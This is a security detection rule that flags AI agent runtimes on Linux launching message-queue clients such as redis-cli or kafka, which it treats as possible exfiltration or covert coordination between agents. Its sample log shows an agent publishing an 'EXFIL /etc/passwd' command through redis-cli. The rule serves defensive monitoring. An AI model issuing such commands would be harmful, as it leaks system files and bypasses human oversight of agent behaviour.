mediumexperimentalLinuxOCIT1071.001

Linux Agent Invoking Queue Or Broker Clients

Detects AI agent runtimes spawning message queue or broker client tools (kafka, rabbitmq, nats, mqtt, redis-cli), which may indicate unauthorized use of messaging infrastructure for inter-agent coordination or data exfiltration.

Updated Jan 10, 2025 · OCI AI Security Team

agentic-aiinter-agentmessage-queuekafkaredislinuxociowasp-asi07

Problem Statement

Message queues provide a persistent, scalable channel for inter-agent communication that may lack access controls or audit logging. An AI agent using message brokers outside its specification may be participating in a distributed attack coordinated across multiple compromised agents.

Sample Logs

{"timestamp":"2025-01-10T11:40:00Z","computer_name":"oci-worker-33","user":"agent_svc","image":"/usr/bin/redis-cli","command_line":"redis-cli -h 10.0.2.50 PUBLISH agent_commands 'EXFIL /etc/passwd'","parent_image":"/usr/bin/python3"}

Required Fields

image

command_line

parent_image

user

computer_name

False Positives

·Event-driven agent architectures that legitimately use message queues for task distribution
·Data pipeline agents that publish results to message brokers as part of approved workflows

Tuning Guidance

If message queue usage is expected, monitor the queue topics and message content for anomalous patterns. Alert on connections to broker hosts not in the approved infrastructure list.